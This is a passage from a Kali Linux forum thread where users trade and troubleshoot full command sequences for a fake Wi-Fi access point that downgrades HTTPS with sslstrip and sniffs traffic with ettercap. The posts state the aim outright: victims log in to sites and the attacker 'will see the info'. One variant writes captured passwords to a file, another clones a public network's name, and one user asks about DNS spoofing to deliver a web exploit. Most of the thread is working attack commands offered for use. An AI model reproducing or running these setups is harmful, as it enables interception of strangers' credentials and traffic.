    64 bytes from 8.8.8.8: icmp_seq=10 ttl=49 time=70.749 ms
    64 bytes from 8.8.8.8: icmp_seq=11 ttl=49 time=75.128 ms
    64 bytes from 8.8.8.8: icmp_seq=12 ttl=49 time=68.981 ms
    Request timeout for icmp_seq 13
    
    --- 8.8.8.8 ping statistics ---
    15 packets transmitted, 12 packets received, 20.0% packet loss
    round-trip min/avg/max/stddev = 48.580/72.025/107.321/13.169 ms
    
    ^CMacBook-Pro-di-Cristian:~ Cristian$ ping google.it
    ping: cannot resolve google.it: Unknown host
    MacBook-Pro-di-Cristian:~ Cristian$
    Thanks
    :-D

    Cris

  29. #29
    Join Date
    2013-Nov
    Posts
    68
    Crix,

    You left out an important step: you need to set which interface has access to the internet (if ethernet, eth0; if one of your wireless cards, wlan0 or wlan1) first.
    wireless=wlan1
    internet=eth0

    I have it working for me, so follow my steps to see if it works for you:

    Step 1:
    wireless=wlan1  # AP interface
    internet=eth0   # interface with internet access. If it's your wireless (usually wlan0), change it to wlan0, then also change wherever you see eth0 to wlan0.

    Step 2:
    gedit /etc/dhcpd.conf
    #######################
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    #########
    Step 3:
    airmon-ng start wlan1
    airbase-ng -e "AnyNameHere" -c 12 mon0
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/init.d/isc-dhcp-server start

    Step 4: open another terminal

    sslstrip -f -p -k 10000

    Step 5: open another terminal

    ettercap -p -u -T -q -i at0

    Step 6: on your device, open a browser, go to yahoo.com or google.com, log in, and you will see the info.
    Last edited by thepoor; 2013-12-11 at 13:22.

  30. #30
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Yes, it works, using only these three rules:
    Code:
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    In the original post there was also

    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    OK.
    Thanks a lot

    Csis

  31. #31
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Hi,
    thanks for sharing.
    With this config... in MY CASE I get an error starting isc-dhcp-server

  32. #32
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by zimmaro View Post
    Hi,
    thanks for sharing.
    With this config... in MY CASE I get an error starting isc-dhcp-server
    Can you post the error message?

  33. #33
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor View Post
    Can you post the error message?
    Nothing... solved... deleted the old logs and now the server starts!!!
    ...but I can't connect to the fake_AP....

  34. #34
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by zimmaro View Post
    Nothing... solved... deleted the old logs and now the server starts!!!
    ...but I can't connect to the fake_AP....
    But that was your code.

  35. #35
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor View Post
    But that was your code.
    1) With """MY""" dhcpd.conf and with """MY""" procedure it WORKED PERFECTLY!!! in my """lan-house-country-provider"""
    2) With the last one posted I tried but could not connect to the fakeAP

    PS: the code is not MINE, I only SHARED my positive test in my LAN after 12345600000000 proofs

    http://imageshack.us/f/20/8wmd.png/
    Last edited by zimmaro; 2013-12-29 at 11:05.

  36. #36
    Join Date
    2014-Feb
    Location
    Italy
    Posts
    3
    Hello everyone, Zimmaro's method works for me, but I wanted to know if you can do DNS spoofing with ettercap so you can try a web exploit... Thanks

  37. #37
    Join Date
    2014-Apr
    Location
    +54
    Posts
    1
    Hi there. I think my case requires some expertise I don't possess about route/iptables. Let me explain: in my notebook, I have a USB RT3070 wifi card, and the onboard Broadcom wifi card. My intention is to:
    1. connect the Broadcom wifi [wlan0] to any hotspot,
    2. use the usb Ralink wifi [wlan1] to create a RAP, --> [at0]
    3. start a DHCP daemon listening on [at0] to lease addresses,
    4. route the traffic from [at0] to [wlan0] to allow normal navigation
    5. attach ettercap + sslstrip to at0.

    So far, following zimmaro's approach, I've managed to create the RAP, start the DHCP listening on at0, and ettercap/sslstrip don't complain about anything. However, there's no routing between the test client (Android device) and [wlan0], which in practice means that I cannot browse from the cellphone, and therefore I can't get any data on ettercap/sslstrip.

    THINGS I'VE TRIED:

    * every little variation posted in this thread about route and iptables, obviously replacing the internet-facing device with [wlan0], to reflect that I'm not using [eth0] but the connected onboard wifi card.

    * DNS is set in dhcpd.conf as 8.8.8.8

    I am 80% sure this is about iptables and route. Either I'm allowing traffic through a static route that is not created/not working as intended, or I'm denying traffic through a route that is correctly/wrongly created.

    I'm gonna stay online waiting & replying. Thanks very much in advance.

  38. #38
    Join Date
    2014-May
    Posts
    18
    This works for me, try it

    #Open Term1
    airmon-ng start wlan1
    airbase-ng -e "DumDum" -c 11 -v mon0

    #Open Term2
    #Install a DHCP for your access point
    nano /etc/dhcp3/dhcpd.conf

    default-lease-time 700;
    max-lease-time 8000;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    range 10.0.0.1 10.0.0.140;
    }


    #start your new WifiRouter.
    ifconfig at0 up
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

    #Start your WifiRouters DHCP
    echo > '/var/lib/dhcp/dhcpd.leases'
    ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0

    #open Term3
    #clear any old iptables and nats you might have

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    #change directory into sslstrip to make life easier
    cd /usr/share/sslstrip/
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
    echo "1" > /proc/sys/net/ipv4/ip_forward

    #Start SSL Stripper
    ./sslstrip.py -l 4444 -w password.txt

  39. #39
    Join Date
    2014-May
    Posts
    1
    Hi,
    I also want to make a fake access point and got the following problem when I try to follow the instructions above:

    ############################################
    root@kali:~# airmon-ng start wlan1 11


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2355 NetworkManager
    2515 wpa_supplicant
    2541 dhclient
    3149 dhclient
    Process with PID 2541 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    mon0 Atheros ath5k - [phy0]
    wlan0 Atheros ath5k - [phy0]

    root@kali:~# airbase-ng -c 11 -e HOME mon0
    15:28:41 Created tap interface at0
    15:28:41 Trying to set MTU on at0 to 1500
    15:28:41 Access Point with BSSID 00:16:44:861:42 started.
    Error: Got channel -1, expected a value > 0.
    ############################################

    ...and the dhcpd configurations look like that:

    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################

    Anybody any ideas?

    (I'm a total noob... need some clarification please...)
    Last edited by Noob_4_Life; 2014-06-01 at 12:02.

  40. #40
    Join Date
    2014-Jun
    Posts
    1
    Noob_4_Life... first you need to learn HOW TO FIX the airodump-ng fixed channel -1 problem...

  41. #41
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Quote Originally Posted by Noob_4_Life View Post
    Hi,
    I also want to make a fake access point and got the following problem when I try to follow the instructions above:

    ############################################
    root@kali:~# airmon-ng start wlan1 11


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    2355 NetworkManager
    2515 wpa_supplicant
    2541 dhclient
    3149 dhclient
    Process with PID 2541 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    mon0 Atheros ath5k - [phy0]
    wlan0 Atheros ath5k - [phy0]

    root@kali:~# airbase-ng -c 11 -e HOME mon0
    15:28:41 Created tap interface at0
    15:28:41 Trying to set MTU on at0 to 1500
    15:28:41 Access Point with BSSID 00:16:44:861:42 started.
    Error: Got channel -1, expected a value > 0.
    ############################################

    ...and the dhcpd configurations look like that:

    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################

    Anybody any ideas?

    (I'm a total noob... need some clarification please...)
    As I can see, you use an ath5k based wifi card. Since airbase-ng based fake APs are extremely slow, you can try to create a master mode based fake AP. To do so, you must install the discontinued madwifi-ng drivers, but they are a little buggy and you can harm your KALI installation. If you're willing to do it, you can try this:
    Code:
    apt-get update
    git clone https://github.com/proski/madwifi madwifi-ng
    apt-get install -y linux-headers-"`uname -r`" 
    apt-get install build-essential libssl-dev
    # Let's patch it for injection
    wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch
    patch -N -p 0 -i madwifi-ng-r4073.patch
    # Let's "unload" our current driver
    modprobe -r ath5k
    modprobe -r ath
    echo "blacklist ath9k" >> /etc/modprobe.d/kali-blacklist.conf
    echo "blacklist ath5k" >> /etc/modprobe.d/kali-blacklist.conf
    echo "blacklist ath" >> /etc/modprobe.d/kali-blacklist.conf
    modprobe ath_pci autocreate=none
    wlanconfig ath0 create wlandev wifi0 wlanmode ap
    and you have a master mode based fake AP! After that you can change your ESSID, channel etc. with:
    Code:
    iwconfig ath0 essid youressid
    iwconfig ath0 channel yourchannel
    Finally I must note that if you want to go back to ath5k you must unload the ath_pci driver, unblacklist the ath5k, ath9k and ath modules in kali-blacklist.conf and load the ath5k driver again.

  42. #42
    Join Date
    2014-Aug
    Posts
    1
    Hi everyone, first of all sorry for my bad English, but it isn't my first language.
    I followed a lot of guides, but I can't get this fake AP working. I also followed Zimmaro's guide, but without results. I can create the AP and I can connect to it (from Windows I also get the message "connected to the Internet"), but when I try to browse I can't. It seems I can ping an address like 8.8.8.8 (not always; in some tests it doesn't work), but if I try to ping www.google.com I can't (only in some tests it worked). From another client I can't ping anything (only in some tests it worked). It seems as if the connection is really slow or unstable (I also see the Skype icon, in the client connected to the fake AP, show as connected for a few moments, but after some seconds it shows "Connecting..." again). Please, could someone help me? These are the instructions I use:

    my GW is: 192.168.1.254

    Code:
    airmon-ng start wlan0 11
    airbase-ng -c 11 -e WIFI_TEST444555 mon0
    ifconfig at0 192.168.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD  --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    Code:
    sslstrip -f -p -k 10000
    Code:
    ettercap -p -u -T -q -i at0
    dhcpd.conf
    Code:
    authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 192.168.0.0 netmask 255.255.255.0 {
    option routers 192.168.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "FREE_WIFI444555";
    option domain-name-servers 192.168.0.1;
    
    
    range 192.168.0.30 192.168.0.60;
    
    }

  43. #43
    Join Date
    2014-Oct
    Posts
    1
    When I do it like zimmaro, after the command
    airbase-ng -c 11 -e wifi mon0
    it says "Error: Got channel -1, expected value > 0"
    and even if I choose another channel it still says the same.
    Sorry for my English.

  44. #44
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    Quote Originally Posted by chestor View Post
    When I do it like zimmaro, after the command
    airbase-ng -c 11 -e wifi mon0
    it says "Error: Got channel -1, expected value > 0"
    and even if I choose another channel it still says the same.
    Sorry for my English.
    Hi there chestor!
    You can try my script
    Aerial - How to E-Z Setup a Multi-mode wireless LAN Based on a Software Access point
    and select mode 6:
    6. MiTM - Transparent SSLstriped WLAN (Sslstrip).
    You will be able to set up a transparent sslstripped wireless LAN very easily with airbase-ng or hostapd.
    It's almost the same as zimmaro's approach.
    Security always begins with personal responsibility. - quietman7

  45. #45
    Join Date
    2014-Oct
    Location
    Location
    Posts
    7
    Hello, I am trying to set up a fake 2.4 GHz WiFi AP. I use the Alfa AWUS036H adapter, which is connected to a WiFi network with ESSID: freewifi. Can I create a fake access point with the same ESSID (freewifi) and share its internet (so that my adapter stays connected to that AP and does not reconnect to the AP I created)? Can I take one WiFi interface and share the internet with it at the same time? Below I show how I try to implement it.

    Gateway in the network from which I take the internet : 192.168.2.1
    Operating System: kali-linux 1.0.9a-i386

    1. Tell me, is the logic of my example correct?

    2. On the Internet I could not find examples of creating a fake AP where one WiFi interface is used both to connect to the Internet and to create the fake AP.

    3. Why does my card not connect to the WiFi network and not receive settings via DHCP? (I also tried the integrated adapter, but the result is the same.) They write that the problem may be in the driver... but why I cannot connect with the built-in adapter I do not understand...


    iw reg set BO
    iwconfig wlan1 txpower 30
    iwconfig wlan1 essid "freewifi" ap 01:00:00:00:00:00 #connection to AP by ESSID and BSSID
    dhclient -v wlan1
    apt-get install isc-dhcp-server
    nano /etc/dhcpd.conf
    ######
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ######
    airmon-ng start wlan1 11
    airbase-ng mon0 -c 7 --essid "freewifi" #creation of FAKE AP with the same ESSID
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    ###### ####
    root@hk3r:~# sslstrip -f -p -k 8080
    ######
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ######
    Additional Information:
    root@kali:~# iptables -L -n
    Chain INPUT (policy ACCEPT)
    target prot opt source destination

    Chain FORWARD (policy ACCEPT)
    target prot opt source destination

    Chain OUTPUT (policy ACCEPT)
    target prot opt source destination

    root@kali:~# dhclient -v wlan1
    Internet Systems Consortium DHCP Client 4.2.2
    Copyright 2004-2011 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Listening on LPF/wlan1/MYADAPTERMAC
    Sending on LPF/wlan1/MYADAPTERMAC
    Sending on Socket/fallback
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 8
    DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 7
    No DHCPOFFERS received.
    No working leases in persistent database - sleeping.

    root@kali:~# tcpdump -i wlan1 port 67 or port 68 -e -n
    clear....
    I would be very glad of any help.

  46. #46
    Join Date
    2014-Nov
    Posts
    3
    Hi, I have some trouble with DNS.
    My configuration is:

    wlan0 is default network for access to lan and internet
    wlan1 is the Alfa wireless network for fakeAP

    The ifconfig output is:
    eth0 Link encap:Ethernet HWaddr 00:1c:25:95:70:18
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    Interrupt:20 Memory:fc600000-fc620000

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:50 errors:0 dropped:0 overruns:0 frame:0
    TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:19773 (19.3 KiB) TX bytes:19773 (19.3 KiB)

    wlan0 Link encap:Ethernet HWaddr 00:16:ea:b1:5d:12
    inet addr:172.16.1.157 Bcast:172.16.255.255 Mask:255.255.0.0
    inet6 addr: fe80::216:eaff:feb1:5d12/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:297 errors:0 dropped:0 overruns:0 frame:0
    TX packets:23 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:22659 (22.1 KiB) TX bytes:2453 (2.3 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:62:04:a9
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    Then route -n is:

    Kernel IP routing table
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 wlan0
    172.16.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan0


    Now my commands are:

    apt-get install dhcp3-server
    gedit /etc/dhcpd.conf


    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 172.16.77.0 netmask 255.255.255.0 {
    option routers 172.16.77.254;
    option subnet-mask 255.255.255.0;
    option domain-name "wifiFREE";
    option domain-name-servers 172.16.77.254;
    range 172.16.77.2 172.16.77.20;
    }


    airmon-ng
    airmon-ng start wlan1
    airbase-ng -c 11 -e wifiFREE mon0


    ifconfig at0 172.16.77.254 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 172.16.77.0 netmask 255.255.255.0 gw 172.16.77.254
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 172.16.1.254
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start

    sslstrip -l 8080

    ettercap -p -u -T -q -i at0

    Then I take my iPad and connect to wifiFREE without any trouble.
    IP addresses are assigned correctly, and if from the iPad with Fing I ping 8.8.8.8 it responds correctly.
    But if from Safari on the iPad I try to open google.com or any other website, after some seconds in which the browser tries unsuccessfully to load the page, I can't display websites.
    If I try with an IP address instead, I can view websites.
    This is strange because even setting

    option domain-name-servers 172.16.77.254, 8.8.8.8;

    I have the same situation.

    Does anyone have an idea about how to solve this strange trouble?
    TIA
    Last edited by myn; 2014-11-22 at 10:55.

  47. #47
    Join Date
    2014-Nov
    Posts
    3
    Is it possibly due to my network firewall, a Cisco ASA? It's strange because in my grandparents' network it works fine.
    Last edited by myn; 2014-11-22 at 10:57.

  48. #48
    Join Date
    2015-Feb
    Posts
    1
    Hi, I have done every step like you did, but on the "victim" machine, when I connect to the fake access point, it says that there is no internet access. I don't know what to do to change that; could anyone help me?

  49. #49
    Join Date
    2014-Feb
    Posts
    1
    Hello, Zimmaro

    I followed your steps and I can connect to the fake WiFi and get an IP via DHCP, but I can't browse the internet. It appears to be a problem with DNS, because the browser keeps trying and trying...

    I do the test with 2 WLANs: wlan0 = interface connected to the internet, wlan1 = fake (USB).

    When I create the fake SSID with # airbase-ng -c 11 -e HOME mon0 I get this output:

    16:35:05 Created tap interface at0
    16:35:05 Trying to set MTU on at0 to 1500
    16:35:05 Trying to set MTU on mon0 to 1800
    16:35:05 Access Point with BSSID 38:B1B:CD:26:35 started.
    Error: Got channel -1, expected a value > 0.



    Can you help me?

    Thank you!

  50. #50
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Manolo View Post
    Hello, Zimmaro

    I followed your steps and I can connect to the fake WiFi and get an IP via DHCP, but I can't browse the internet. It appears to be a problem with DNS, because the browser keeps trying and trying...

    I do the test with 2 WLANs: wlan0 = interface connected to the internet, wlan1 = fake (USB).

    When I create the fake SSID with # airbase-ng -c 11 -e HOME mon0 I get this output:

    16:35:05 Created tap interface at0
    16:35:05 Trying to set MTU on at0 to 1500
    16:35:05 Trying to set MTU on mon0 to 1800
    16:35:05 Access Point with BSSID 38:B1B:CD:26:35 started.
    Error: Got channel -1, expected a value > 0.



    Can you help me?

    Thank you!
    Hi :-)
    - For the error -1, try to use airmon-zc to put the ""fake-usb-device"" in monitor mode
    http://postimg.org/image/4e8na9zq7/
    - For a correct fake_AP... my procedure is TOO OLD (for old Kali versions and old victim browsers/updated systems); now I don't have time to RE-TEST it on the new Kali 1.1.0a... USE the PLUS-GREAT script Aerial.sh by Nick_The_Greek (worked fine and has many options)
    Bye
    Last edited by zimmaro; 2015-04-23 at 08:53.
